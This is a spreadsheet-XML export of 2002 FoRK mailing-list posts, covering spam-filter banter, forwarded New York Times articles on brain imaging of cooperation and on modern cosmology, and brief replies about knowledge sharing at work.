&gt; Did someone invert the spam filters? I'm getting almost nothing but spam on
&gt; fork now...SPAM ASSASSIN.Someone of your highly developed intelligence should have no problems
installing such a well-known and commonly used program.I personally still think the solution is to restrict posting to members.
But I guess my brown shirt is showing again.- JoeP.S. I hate everybody.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hmmm.  Rumsfeld and Cheney are in
the white house, the president says
he's not a crook (and no, you can't
have those tapes), and the market is
melting down.Anyone want to go to Andy Capps for
a beer?  I hear they have this new
game called "Pong"...Have a nice day,
-DaveAnyone seen Elvis lately?http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-07-22 at 17:19, Joseph S. Barrera III wrote:
&gt; - Joe
&gt; 
&gt; P.S. I hate everybody.So you /are/ beberg posting under another name. Finally proof of what
we've known all along. ;)
Luis
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Luis Villa wrote:
 &gt; So you /are/ beberg posting under another name.
 &gt; Finally proof of what we've known all along. ;)That'll come to a shock to Geege, I'm sure...- Joehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.
Axelrod, eh? "the E.coli of social psychology"? Nice to see our old friend still going strong -- Prisoner's Dilemma is old enough to qualify for AARP membership!Regarding experimental design, it is interesting that 1) they used an all-female panel and 2) they included a mix of ages, from 20-60 and 3) they used humans, confederates, computers as well as imitations. The last two paragraphs are a rare sign of editorialized humor by an NY Times bylined writer. Even still, note the very large fig leaf -- the CEO joke is introduced in an on-the-record quote. Not that we're talking about anything nearly as colorful as the Economist :-)RKkhare@alumni.caltech.edu
Why We're So Nice: We're Wired to CooperateJuly 23, 2002
By NATALIE ANGIER 
 What feels as good as chocolate on the tongue or money in
the bank but won't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Prisoner's Dilemma, in
which participants can select from a number of greedy or
cooperative strategies as they pursue financial gain,
researchers found that when the women chose mutualism over
"me-ism," the mental circuitry normally associated with
reward-seeking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"It's reassuring," Dr. Berns said. "In some ways, it says
that we're wired to cooperate with each other." The study is among the first to use M.R.I. technology to
examine social interactions in real time, as opposed to
taking brain images while subjects stared at static
pictures or thought-prescribed thoughts. It is also a novel approach to exploring an ancient
conundrum, why are humans so, well, nice? Why are they
willing to cooperate with people whom they barely know and
to do good deeds and to play fair a surprisingly high
percentage of the time? Scientists have no trouble explaining the evolution of
competitive behavior. But the depth and breadth of human
altruism, the willingness to forgo immediate personal gain
for the long-term common good, far exceeds behaviors seen
even in other large-brained highly social species like
chimpanzees and dolphins, and it has as such been difficult
to understand. "I've pointed out to my students how impressive it is that
you can take a group of young men and women of prime
reproductive age, have them come into a classroom, sit down
and be perfectly comfortable and civil to each other," said
Dr. Peter J. Richerson, a professor of environmental
science and policy at the University of California at Davis
and an influential theorist in the field of cultural
evolution. "If you put 50 male and 50 female chimpanzees
that don't know each other into a lecture hall, it would be
a social explosion." Dr. Ernst Fehr of the University of Zurich and colleagues
recently presented findings on the importance of punishment
in maintaining cooperative behavior among humans and the
willingness of people to punish those who commit crimes or
violate norms, even when the chastisers take risks and gain
nothing themselves while serving as ad hoc police. In her survey of the management of so-called commons in
small-scale communities where villagers have the right, for
example, to graze livestock on commonly held land, Dr.
Elinor Ostrom of Indiana University found that all
communities have some form of monitoring to gird against
cheating or using more than a fair share of the resource. In laboratory games that mimic small-scale commons, Dr.
Richerson said, 20 to 30 percent have to be coerced by a
threat of punishment to cooperate. Fear alone is not highly likely to inspire cooperative
behavior to the degree observed among humans. If research
like Dr. Fehr's shows the stick side of the equation, the
newest findings present the neural carrot - people
cooperate because it feels good to do it. In the new findings, the researchers studied 36 women from
20 to 60 years old, many of them students at Emory and
inspired to participate by the promise of monetary rewards.
The scientists chose an all-female sample because so few
brain-imaging studies have looked at only women. Most have
been limited to men or to a mixture of men and women. But there is a vast body of non- imaging data that rely on
using the Prisoner's Dilemma. "It's a simple and elegant model for reciprocity," said Dr.
James K. Rilling, an author on the Neuron paper who is at
Princeton. "It's been referred to as the E. coli of social
psychology." &gt;&gt;From past results, the researchers said, one can assume
that neuro- imaging studies of men playing the game would
be similar to their new findings with women. The basic structure of the trial had two women meet each
other briefly ahead of time. One was placed in the scanner
while the other remained outside the scanning room. The two
interacted by computer, playing about 20 rounds of the
game. In every round, each player pressed a button to
indicate whether she would "cooperate" or "defect." Her
answer would be shown on-screen to the other player. The monetary awards were apportioned after each round. If
one player defected and the other cooperated, the defector
earned $3 and the cooperator nothing. If both chose to
cooperate, each earned $2. If both opted to defect, each
earned $1. Hence, mutual cooperation from start to finish was a far
more profitable strategy, at $40 a woman, than complete
mutual defection, which gave each $20. The risk that a woman took each time she became greedy for
a little bit more was that the cooperative strategy would
fall apart and that both would emerge the poorer. In some cases, both women were allowed to pursue any
strategy that they chose. In other cases, the non- scanned
woman would be a "confederate" with the researchers,
instructed, unbeknown to the scanned subject, to defect
after three consecutive rounds of cooperation, the better
to keep things less rarefied and pretty and more lifelike
and gritty. In still other experiments, the woman in the scanner played
a computer and knew that her partner was a machine. In
other tests, women played a computer but thought that it
was a human. The researchers found that as a rule the freely
strategizing women cooperated. Even occasional episodes of
defection, whether from free strategizers or confederates,
were not necessarily fatal to an alliance. "The social bond could be reattained easily if the defector
chose to cooperate in the next couple of rounds," another
author of the report, Dr. Clinton D. Kilts, said, "although
the one who had originally been `betrayed' might be wary
from then on." As a result of the episodic defections, the average
per-experiment take for the participants was in the $30's.
"Some pairs, though, got locked into mutual defection," Dr.
Rilling said. Analyzing the scans, the researchers found that in rounds
of cooperation, two broad areas of the brain were
activated, both rich in neurons able to respond to
dopamine, the brain chemical famed for its role in
addictive behaviors. One is the anteroventral striatum in the middle of the
brain right above the spinal cord. Experiments with rats
have shown that when electrodes are placed in the striatum,
the animals will repeatedly press a bar to stimulate the
electrodes, apparently receiving such pleasurable feedback
that they will starve to death rather than stop pressing
the bar. Another region activated during cooperation was the
orbitofrontal cortex in the region right above the eyes. In
addition to being part of the reward-processing system, Dr.
Rilling said, it is also involved in impulse control. "Every round, you're confronted with the possibility of
getting an extra dollar by defecting," he said. "The choice
to cooperate requires impulse control." Significantly, the reward circuitry of the women was
considerably less responsive when they knew that they were
playing against a computer. The thought of a human bond,
but not mere monetary gain, was the source of contentment
on display. In concert with the imaging results, the women, when asked
afterward for summaries of how they felt during the games,
often described feeling good when they cooperated and
expressed positive feelings of camaraderie toward their
playing partners. Assuming that the urge to cooperate is to some extent
innate among humans and reinforced by the brain's feel-good
circuitry, the question of why it arose remains unclear.
Anthropologists have speculated that it took teamwork for
humanity's ancestors to hunt large game or gather difficult
plant foods or rear difficult children. So the capacity to
cooperate conferred a survival advantage on our forebears. Yet as with any other trait, the willingness to abide by
the golden rule and to be a good citizen and not cheat and
steal from one's neighbors is not uniformly distributed. "If we put some C.E.O.'s in here, I'd like to see how they
respond," Dr. Kilts said. "Maybe they wouldn't find a
positive social interaction rewarding at all." A Prisoner's Dilemma indeed.
http://www.nytimes.com/2002/07/23/health/psychology/23COOP.html?ex=1028415440&amp;ei=1&amp;en=2face896773fa4eaHOW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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.
I'm sure that at the end of the universe, they'll still only find Douglas Adams, calmly munching away on his mooburger :-)The prospect of expansion so rapid that the night sky empties out because other galaxies are simply *outside* our light cone -- ??!? -- is really chilling. Puts comm latency in a whole new perspective... what if, in the future, processors go so fast there *is* no network? Or, at least, TCP segments would arrive so rarely they would seem as inscrutable as commandments from the heavens...Rohitkhare@alumni.caltech.edu
In the Beginning ...July 23, 2002
By DENNIS OVERBYE 
 It has always been easy to make fun of cosmologists,
confined to a dust mote lost in space, pronouncing judgment
on the fate of the universe or the behavior of galaxies
billions of light-years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so-called
Steady State. In the last few years, however, a funny thing has happened.
Cosmologists are beginning to agree with one another.
Blessed with new instruments like the Hubble Space
Telescope and other space-based observatories, a new
generation of their giant cousins on the ground and
ever-faster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14 billion
years ago in the Big Bang. Most of its material remains
resides in huge clouds of invisible so-called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 astronomers led by Dr. William
Percival at the University of Edinburgh combined data from
a variety of observations to compile, based on the simplest
theoretical model, what they say is the most precise
enumeration yet of the parameters that cosmologists have
been fighting about for all these decades. The universe, they calculated, is 13.89 billion years old,
plus or minus half a billion years. Only 4.8 percent of it
is made of ordinary matter. Matter of all types, known and
unknown, luminous and dark, accounts for just 27.5 percent.
The rest of creation, 72.5 percent, is the mysterious dark
energy, they reported in a paper submitted last month to
The Monthly Notices of the Royal Astronomical Society. It is a picture that in some ways is surprisingly simple,
satisfying long-held theoretical prejudices about how the
universe should be designed. Continued agreement with
coming experiments may mean that science is approaching the
end of a "great program" of cosmological tests that began
in the 1930's, Dr. P. J. E. Peebles of Princeton and Dr.
Bharat Ratra of Kansas State University said in the draft
of a coming article for The Reviews of Modern Physics. In other ways this new dark universe is utterly baffling, a
road map to new mysteries. Dr. Marc Davis, a cosmologist at
the University of California at Berkeley, called it "a
universe chock full of exotics that don't make sense to
anybody." Moreover there are some questions that scientists still do
not know how to ask, let alone answer, scientifically. Was
there anything before the Big Bang? Is there a role for
life in the cosmos? Why is there something rather than
nothing at all? Will we ever know? "We know much, but we still understand very little," said
Dr. Michael Turner, a cosmologist at the University of
Chicago. The Big Question Expanding Forever, 
Or Big Crunch? The dim caves of Lascaux, the plains of
Stonehenge and the dreamtime tales of Australian aborigines
all testify to the need to explain the world and existence.
This quest took its present form in 1917. That was when
Albert Einstein took his new general theory of relativity,
which explained how matter and energy warp space-time to
produce gravity, and applied it to the universe. Einstein discovered that the cosmos as his theory described
it would be unstable, prone to collapse under its own
gravity. Astronomers, however, were sure that the universe
was stable. So Einstein added a fudge factor that he called
the cosmological constant to his equations. It acted as a
long-range repulsive force to counterbalance gravity. In 1929, the astronomer Edwin Hubble discovered that the
universe was expanding. The sky was full of distant
galaxies all rushing away from us and one another, as if
propelled by what the British astronomer Dr. Fred Hoyle
later called derisively a "big bang." The universe was not
stable and, thus, did not require counterbalancing.
Einstein abandoned his constant, referring to it as his
biggest blunder. But it would return to haunt cosmologists,
and the universe. Hoyle's term stuck, and the notion of an explosive genesis
became orthodoxy in 1965, when Dr. Arno Penzias and Dr.
Robert Wilson, radio astronomers at Bell Laboratories,
discovered a faint uniform radio glow that pervaded the
sky. It was, cosmologists concluded, the fading remnant of
the primordial fireball itself. Relieved of their fudge factor, the equations describing
Einstein's universe were simple. Dr. Allan Sandage, the
Carnegie Observatories astronomer, once called cosmology
"the search for two numbers" - one, the Hubble constant,
telling how fast the universe is expanding, and the other
telling how fast the expansion is slowing, and thus whether
the universe will expand forever or not. The second number, known as the deceleration parameter,
indicated how much the cosmos had been warped by the
density of its contents. In a high-density universe, space
would be curved around on itself like a ball. Such a
universe would eventually stop expanding and fall back
together in a big crunch that would extinguish space and
time, as well as the galaxies and stars that inhabit them.
A low-density universe, on the other hand, would have an
opposite or "open" curvature like a saddle, harder to
envision, and would expand forever. In between with no overall warpage at all was a
"Goldilocks" universe with just the right density to expand
forever but more and more slowly, so that after an infinite
time it would coast to a stop. This was a "flat" universe
in the cosmological parlance, and to many theorists the
simplest and most mathematically beautiful solution of all.
But the sky did not yield those cosmic numbers easily, even
with the help of the 200-inch Hale telescope on Palomar
Mountain in Southern California, dedicated in 1948, which
had been built largely for that task. Dr. Hubble wrote of
measuring shadows and searching "among ghostly errors of
measurement for landmarks that are scarcely more
substantial." The Dark Side Invisible Matter 
Molds Galaxies 
It was not till the mid-70's, a
quarter-century after the Palomar giant began operating,
that groups of astronomers reached the tentative conclusion
that the universe they could see - stars, gas, planets and
galaxies - did not have nearly enough gravitational oomph
to stop the cosmic expansion. "So the universe will continue to expand forever and
galaxies will get farther and farther apart, and things
will just die," Dr. Sandage said at the time. But the Great Argument was just beginning. Apparently there
was a lot of the universe that astronomers could not see.
The stars and galaxies, were moving as if immersed in the
gravity of giant invisible clouds of so-called dark matter
- "missing matter" the Swiss astronomer Dr. Fritz Zwicky
labeled it in the 1930's. Many galaxies, for example, are rotating so fast that they
would fly apart unless they were being reined in by the
gravity of halos of dark matter, according to pioneering
observations by Dr. Vera Rubin of the Carnegie Institution
of Washington and her colleagues. Her measurements
indicated that these dark halos outweighed the visible
galaxies themselves from 5 to 10 times. But there could be
even more dark matter farther out in space, perhaps enough
to stop the expansion of the universe, eventually, some
theorists suggested. Luminous matter, the Darth Vaders of
the sky said, is like the snow on mountaintops. But what is the dark matter? While some of it is gas or
dark dim objects like stars and planets, cosmologists
speculate that most of it is subatomic particles left over
from the Big Bang. Many varieties of these particles are predicted by theories
of high-energy physics. But their existence has not been
confirmed or detected in particle accelerators. "We theorists can invent all sorts of garbage to fill the
universe," Dr. Sheldon Glashow, a Harvard physicist and
Nobel laureate, told a gathering on dark matter in 1981. Collectively known as WIMP's, for weakly interacting
massive particles, such particles would not respond to
electromagnetism, the force responsible for light, and thus
would be unable to radiate or reflect light. They would
also be relatively slow-moving, or "cold" in physics
jargon, and thus also go by the name of cold dark matter. As Earth in its travels passed through the dark-matter
cloud that presumably envelops the Milky Way, the particles
would shoot through our bodies, rarely leaving a trace,
like moonlight through a window. But the collective gravity of such particles, cosmologists
say, would shape the cosmos and its contents. Gathering along the fault lines laid down by random
perturbations of density in the early universe, dark matter
would congeal into clouds with about the mass of 100,000
Suns. The ordinary matter that was mixed in with it would
cool and fall to the centers of the clouds and light up as
stars. The clouds would then attract other clouds. Through a
series of mergers over billions of years, smaller clouds
would assemble into galaxies, and the galaxies would then
assemble themselves into clusters of thousands of galaxies,
and so forth. Using the Hubble and other telescopes as time machines -
light travels at a finite speed, so the farther out
astronomers look the farther back in time they see -
cosmologists have begun to confirm that the universe did
assemble itself from the "bottom up," as the dark matter
model predicts. Last year, two teams of astronomers reported seeing the
first stars burning their way out of the cloudy aftermath
of the Big Bang, when the universe was only 900 million
years old. The bulk of galaxy formation occurred when the
universe was a half to a quarter its present age,
cosmologists say. "The big news in the last decade is that even half a
universe ago the universe looked pretty different," said
Dr. Alan Dressler of the Carnegie Observatories in
Pasadena. Galaxies before then were small and irregular,
with no sign of the majestic spiral spider webs that
decorate the sky today. We would barely recognize our own Milky Way galaxy, if we
could see it five billion years ago when the Sun formed, he
said. "By eight billion years back, it would be unrecognizable,"
said Dr. Dressler. Yet there are still many questions that the cold dark
matter model does not answer. Astronomers still do not
know, for example, how the first stars formed or why the
models of dark matter distribution don't quite fit in the
cores of some kinds of galaxies. Nor have the dark matter
particles themselves been unambiguously detected or
identified, despite continuing experiments. Some astronomers suggest that the discrepancies stem from
the inability of simple mathematical models to deal with
messy details of the real world. "It's a huge mystery exactly how stars form," Dr. Richard
Bond of the Canadian Institute for Theoretical Astrophysics
said. "We can't solve it now. So it's even harder to try to
solve them back then." But others, notably Dr. Mordehai Milgrom, a theorist at the
Weizmann Institute in Israel, have suggested that modifying
the gravitational laws by which dark matter was deduced in
the first place would alleviate the need for dark matter
altogether. The Bang's Fuel Inflating One Ounce 
To a Whole Universe 
Clues to what had actually exploded
in the Big Bang emerged as an unexpected gift from another
great scientific quest: physicists' pursuit for a so-called
theory of everything that would unite all physical
phenomena in a single equation. Unable to build machines
powerful enough to test their most ambitious notions on
Earth, some theorists turned to the sky. "The Big Bang is the poor man's particle accelerator," Dr.
Jakob Zeldovich, an influential Russian cosmologist, said. Physicists recognize four forces at work in the world
today - gravity, electromagnetism, and the strong and weak
nuclear forces. But they suspect, based on data from
particle accelerators and high-powered theory, that those
are simply different manifestations of a single unified
force that ruled the universe in its earliest, hottest
moments. As the universe cooled, according to this theory, there was
a fall from grace, and the laws of physics evolved, with
one force after another "freezing out," or splitting away. In 1979, Dr. Alan Guth, now at the Massachusetts Institute
of Technology, realized that a hypothesized glitch in this
process would have had drastic consequences for the
universe. Under some circumstances, a glass of water can
stay liquid as the temperature falls below 32 degrees,
until it is disturbed, at which point it will rapidly
freeze, releasing latent heat in the process. Similarly,
the universe could "supercool" and stay in a unified state
too long. In that case, space itself would become
temporarily imbued with a mysterious kind of latent heat,
or energy. Inserted into Einstein's equations, the latent energy would
act as a kind of antigravity, and the universe would blow
itself apart, Dr. Guth discovered in a calculation in 1979.
In far less than the blink of an eye, 10-37 second, a speck
much smaller than a proton would have swollen to the size
of a grapefruit and then resumed its more stately
expansion, with all of normal cosmic history before it,
resulting in today's observable universe - a patch of sky
and stars 14 billion light-years across. All, by the
magical-seeming logic of Einstein's equations, from about
an ounce of primordial stuff. "The universe," Dr. Guth liked to say, "might be the
ultimate free lunch." Dr. Guth called his theory inflation. Inflation, as Dr.
Guth pointed out, explains why the universe is expanding.
Dr. Turner of the University of Chicago referred to it as
"the dynamite behind the Big Bang." As modified and improved by Dr. Andrei Linde, now at
Stanford, and by Dr. Paul Steinhardt, now at Princeton and
Dr. Andreas Albrecht now at the University of California at
Davis, inflation has been the workhorse of cosmology ever
since. One of its great virtues, cosmologists say, is that
inflation explains the origin of galaxies, the main
citizens of the cosmos. The answer comes from the
paradoxical-sounding quantum rules that govern subatomic
affairs. On the smallest scales, according to quantum
theory, nature is lumpy, emitting even energy in little
bits and subject to an irreducible randomness. As a result,
so-called quantum fluctuations would leave faint lumps in
the early universe. These would serve as the gravitational
seeds for future galaxies and other cosmic structures. As a result of such successes, cosmologists have stuck with
the idea of inflation, even though, lacking the ability to
test their theories at the high energies of the Big Bang,
they have no precise theory about what might have actually
caused it. "Inflation is actually a class of theories,"
said Dr. Guth. In the latest version, called "chaotic inflation," Dr.
Linde has argued that quantum fluctuations in a myriad of
theorized force fields could have done the trick. Indeed, he and others now say they believe that inflation
can occur over and over, spawning an endless chain of
universes out of one another, like bubbles within bubbles. "The universe inflates on top of itself," Dr. Linde told a
physics conference this spring in Princeton. "It's
happening right now." The Golden Age New Devices Detect 
Primordial Glow 
If the inflationary
theorists are right, the universe we see, the 14 billion
light-years, is just a tiny piece of a much vaster
universe, or even a whole ensemble of them, forever out of
our view. According to the theory, therefore, our own little patch of
the cosmos should appear geometrically "flat," the way a
section of a balloon looks flat when viewed close up. This
was the universe long thought to be the most beautiful and
simple. But it required, by the logic of Einstein's general
relativity, that there be much more dark matter, or
something, to the universe, enough to "flatten" space-time,
than astronomers had found. In fact, this prescription was so hard to reconcile with
other observations, of galaxies and their evolutions, that
by 1991 some astronomers and press reports suggested that
the entire theoretical edifice of inflation to blow up the
universe and cold dark matter to fill it, not to say the
Big Bang itself, might have to be junked. So it was with a sigh of relief that cosmologists greeted
the announcement in April 1992 that NASA's Cosmic
Background Explorer, or COBE, satellite had succeeded in
discerning faint blotches in the primordial cosmic radio
glow. These were the seeds from which, inflation predicted, large
cosmic structures would eventually grow. "If you're religious, it's like seeing God," said Dr.
George Smoot, a physicist from the Lawrence Berkeley
National Laboratory who led the COBE team. Astronomers say COBE signaled a transition in which heroic
ideas about the universe began to be replaced by heroic
data, as long-planned new telescopes and other instruments
went into operation. A year later, skywalking astronauts corrected the Hubble
telescope's myopic vision. The cosmic background radiation
has come in for particular scrutiny from new radio
telescopes mounted in balloons and on mountaintops. The
news has been good, though not decisive, for inflation. For three years, a series of increasingly high-resolution
observations has confirmed that the pattern of blotches
stippling the remnant of the primordial fireball is
consistent with the predictions from inflation and cold
dark matter. The instruments have now mapped details small
enough to have been the seeds of modern clusters of
galaxies. "I'm completely snowed by the cosmic background radiation,"
Dr. Guth said. "The signal was so weak it wasn't even
detected until 1965, and now they're measuring fluctuations
of one part in 100,000." Perhaps most important, the analysis of the fluctuations
indicates that the universe has a "flat" geometry, as
predicted by inflation. That was a triumph. Although
observations could not prove that inflation was right, a
nonflat universe would have been a blow to the theory, and
to cosmological orthodoxy. "Inflation, our boldest and most promising theory of the
earliest moments of creation, passed its first very
important test," Dr. Turner said at the time. The most precise measurements of the cosmic background, at
least in the near future, are generally expected to come
late this year from NASA's Microwave Anisotropy Project, or
MAP, satellite, which was launched into space last year on
June 30. MAP will be followed by the European Space
Agency's Planck satellite, in 2006. It is highly unlikely that MAP or Planck will be able to
detect what Dr. Turner calls "the smoking gun signature of
inflation." The violent stretching of the universe should
roil space-time with so-called gravitational waves that
would leave a faint imprint on the cosmic fireball. Detecting those waves would not only confirm inflation, but
also might help scientists establish what caused the
inflation in the first place, giving science its first look
at the strange physics that prevailed when creation was
only about a trillionth of a trillionth of a trillionth of
a second old. The Universe's Fate Bleak Implications 
Of `Dark Energy' In 1998, two competing teams of
astronomers startled the scientific world with the news
that the expansion of the universe seemed to be speeding up
under the influence of a mysterious antigravity that seems
embedded in space itself and that is hauntingly reminiscent
of Einstein's old, presumably discredited, cosmological
constant. "Dark energy," the phenomenon was quickly named. If dark
energy is real and the acceleration continues, the galaxies
will eventually speed away from one another so quickly that
they couldn't see one another. The universe would become
cold and empty as the continued acceleration sucked away
the energy needed for life and thought. It would be "the worst possible universe," for the quality
and quantity of life, said Dr. Lawrence Krauss, a physicist
at Case Western Reserve University. Dr. Edward Witten of the Institute for Advanced Study in
Princeton, called the discovery of dark energy "the
strangest experimental finding since I've been in physics."
The discovery was a surprise to the astronomers involved.
Neither team had expected to find the universe
accelerating. They had each set out to measure by how much
the expansion of the universe was slowing because of the
gravity of its contents and thus settle the question of its
fate. One team was led by Dr. Saul Perlmutter, a physicist at
Lawrence Berkeley. The other team was a band of astronomers
led by Dr. Brian Schmidt of Mount Stromlo and the Siding
Spring Observatory in Australia. Each group employed far-flung networks of telescopes,
including the Hubble, and the Internet to find and monitor
certain exploding stars, or supernovas, as cosmic beacons.
Such explosions, the death rattles of massive stars, are
powerful enough to be seen clear across the universe when
the universe was younger and, presumably, expanding faster.
Leapfrogging each other across the universe, the two teams,
propitiously for their credibility, arrived at the same
answer at the same time: the cosmos was not slowing at all;
it was speeding up. Dr. Perlmutter, who had once resented the competition,
conceded, "With only one group, it would have been a lot
harder to get the community to buy into such a surprising
result." "This was a very strange result," said Dr. Adam Riess, a
member of Dr. Schmidt's team. "It was the opposite of what
we thought we were doing." The results have sent Einstein's old cosmological constant
to the forefront of cosmology. Despite his disavowal, the
constant had never really gone away and had in fact been
given new life by quantum physics. Einstein had famously
rejected quantum's randomness, saying God didn't play dice.
But it justified, in retrospect, his fudge factor. According to the uncertainty principle, a pillar of quantum
theory, empty space was not empty, but rather foaming with
the energy of so-called virtual particles as they flashed
in and out of existence on borrowed energy. This so-called
vacuum energy could repel, just like Einstein's old
cosmological constant, or attract. The case for dark energy got even stronger a year later,
when the cosmic background observations reported evidence
of a flat universe. Because astronomers had been able to
find only about a third as much matter, both dark and
luminous, as was needed by Einstein's laws to create a flat
geometry, something else had to be adding to it. The discovery of dark energy exemplified Dr. Zeldovich's
view of the universe as the poor man's particle
accelerator, and it caught the physicists flat-footed,
somewhat to the pride of the astronomers. "A coming of age of astronomy," Dr. Dressler called it.
What is dark energy? The question now hangs over the
universe. Is it really Einstein's old fudge factor returned to haunt
his children? In that case, as the universe expands and the
volume of space increases, astronomers say, the push
because of dark energy will also increase, accelerating the
galaxies away from one another faster and faster, leading
to a dire dark future. Other physicists, however, have pointed out that the
theories of modern physics are replete with mysterious
force fields, collectively called "quintessence," that
might or might not exist, but that could temporarily
produce negative gravity and mimic the action of a
cosmological constant. In that case, all bets on the future
are off. The universe could accelerate and then decelerate,
or vice versa as the dark energy fields rose or fell. A third possibility is that dark energy does not exist at
all, in which case not just the future, but the whole
carefully constructed jigsaw puzzle of cosmology, might be
in doubt. The effects of cosmic acceleration could be
mimicked, astronomers say, by unusual dust in the far
universe or by unsuspected changes in the characteristics
of supernovas over cosmic time. As a result, more groups
are joining the original two teams in the hunt for new
supernovas and other ways to measure the effects of dark
energy on the history of the universe. Dr. Perlmutter has proposed building a special satellite
telescope, the Supernova Astronomy Project, to investigate
exactly when and how abruptly the cosmic acceleration
kicked in. The Nagging QuestionsA Grand Synthesis, 
But Hardly Complete 
For all the new answers being
harvested, some old questions linger, and they have now
been joined by new ones. A flat universe is the most mathematically appealing
solution of Einstein's equations, cosmologists agree. But
they are puzzled by the specific recipe, large helpings of
dark matter and dark energy, that nature has chosen. Dr.
Turner called it "a preposterous universe." But Dr. Martin Rees, a Cambridge University cosmologist,
said that the discovery of a deeper principle governing the
universe and, perhaps, life, may alter our view of what is
fundamental. Some features of the universe that are now
considered fundamental - like the exact mixture of dark
matter, dark energy and regular stuff in the cosmos - may
turn out to be mere accidents of evolution in one out of
the many, many universes allowed by eternal inflation. "If we had a theory, then we would know whether there were
many big bangs or one," Dr. Rees said. The answers to these
and other questions, many scientists suspect, have to await
the final unification of physics, a theory that reconciles
Einstein's relativity, which describes the shape of the
universe, to the quantum chaos that lives inside it. Such a theory, quantum gravity, is needed to describe the
first few moments of the universe, when it was so small
that even space and time should become fuzzy and
discontinuous. For two decades, many physicists have placed their bets for
quantum gravity on string theory, which posits that
elementary particles are tiny strings vibrating in a 10- or
11-dimensional space. Each kind of particle, in a sense,
corresponds to a different note on the string. In principle, string theory can explain all the forces of
nature. But even its adherents concede that their equations
are just approximations to an unknown theory that they call
M-theory, with "M" standing for matrix, magic, mystery or
even mother, as in "mother of all theories." Moreover, the
effects of "stringy physics" are only evident at energies
forever beyond the limits of particle accelerators. Some string theorists have ventured into cosmology, hoping,
to discover some effect that would show up in the poor
man's particle accelerator, the sky. In addition to strings, the theory also includes membranes,
or "branes," of various dimensions. Our universe can be
envisioned as such a brane floating in higher-dimensional
space like a leaf in a fish tank, perhaps with other brane
universes nearby. These branes could interact
gravitationally or even collide, setting off the Big Bang. In one version suggested last year by four cosmologists
led by Dr. Steinhardt of Princeton, another brane would
repeatedly collide with our own. They pass back and forth
through each other, causing our universe to undergo an
eternal chain of big bangs. Such notions are probably the future for those who are paid
to wonder about the universe. And the fruits of this work could yet cause cosmologists to
reconsider their new consensus, warned Dr. Peebles of
Princeton, who has often acted as the conscience of the
cosmological community, trying to put the brakes on faddish
trends. He wonders whether the situation today can be compared to
another historical era, around 1900, when many people
thought that physics was essentially finished and when the
English physicist Lord Kelvin said that just a couple of
"clouds" remained to be dealt with. "A few annoying tidbits, which turned out to be relativity
and quantum theory," the twin revolutions of 20th-century
science, Dr. Peebles said. Likewise, there are a few clouds today like what he called
"the dark sector," which could have more complicated
physics than cosmologists think. "I'm not convinced these clouds herald revolutions as deep
as relativity and quantum mechanics," Dr. Peebles said.
"I'm not arguing that they won't." As for the fate of the universe, we will never have a firm
answer, said Dr. Sandage, who was Hubble's protï¿½gï¿½ and has
seen it all. "It's like asking, `Does God exist?' " he said.
Predicting the future, he pointed out, requires faith that
simple mathematical models really work to describe the
universe. "I don't think we really know how things work," he said.
Although Dr. Sandage does not buy into all aspects of the
emerging orthodoxy, he said it was a fantastic time to be
alive. "It's all working toward a much grander synthesis than we
could have imagined 100 years ago," he said. "I think this
is the most exciting life I could have had."http://www.nytimes.com/2002/07/23/science/space/23UNIV.html?ex=1028416223&amp;ei=1&amp;en=ff38ea5fac0c9158HOW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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
&gt;
&gt; The question then becomes, why is knowledge sharing such a difficult 
&gt; thing in organizations? Is it, perhaps, not as difficult as the 
&gt; grousers say? I mistrust the romantic, Rousseauian argument that man 
&gt; is basically good but society basically corrupt, and that the later 
&gt; stifles the natural altruistic impulses. After all, it's in society 
&gt; that we share, as well as hoard.  Is it that we think of "The 
&gt; Organization" as a machine, and like the research subjects get less 
&gt; neurological pleasure from cooperating with it than we would if it 
&gt; were humanized? Or ...?
&gt;
&gt;  
&gt;Well, IMNHO, its because companies do not reward knowledge sharers. When 
time comes for evaluation, there isn't a line on the page saying "Helped 
others to succeed with their projects." Sharing inevitably cuts into the 
time for personal productive work, and generally shows up as a red flag 
if your boss has a "management by exception"(1) style.Owen1. http://www.xrefer.com/entry/164669http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
I wonder if the CEO dig also suggests proprietary software vendors
may in fact be /physiologically/ sociopathic...damn, now I've just been defacto excluded from yet another well-paid
subculture!  it's just not my day.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "O" == Owen Byrne  writes:    O&gt; Well, IMNHO, its because companies do not reward knowledge
    O&gt; sharers. When time comes for evaluation, there isn't a line on
    O&gt; the page saying "Helped others to succeed with their projects."And yet, in my experience, it still happens, but always "unofficially"
and "off the record".  It's as if we believe that "the gods" will
punish us if we are seen to have behaved in a human fashion while on
company time, either by being caught red-handed, or having the
paper-trail finger us later.  Yet even CEOs will "pull strings" to
make things happen, and, also in my experience, those are the moments
when things actually do happen.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"SpamAssassin Killed My Independence Day Party"With all the spam that gets through, I had no idea
a filter was in effect at the FoRK listserv. Turn it off! It not only risks silent false 
positives, but suffers them in such a way that 
individuals cannot adjust/detect/remedy them. Also, anti-spam startups need end-users. 
Centralized spam fighting takes food out
of those coders' mouths!I still think self-add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forged-"from" spammers. - Gordon----- Original Message ----- 
From: "Rohit Khare" 
To: 
Sent: Tuesday, July 23, 2002 12:25 PM
Subject: Re: HD/ID: High-Def Independence Day
&gt; On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote:
&gt; &gt; You're all invited to join me for a South Bay Hi-Def spectacle at my 
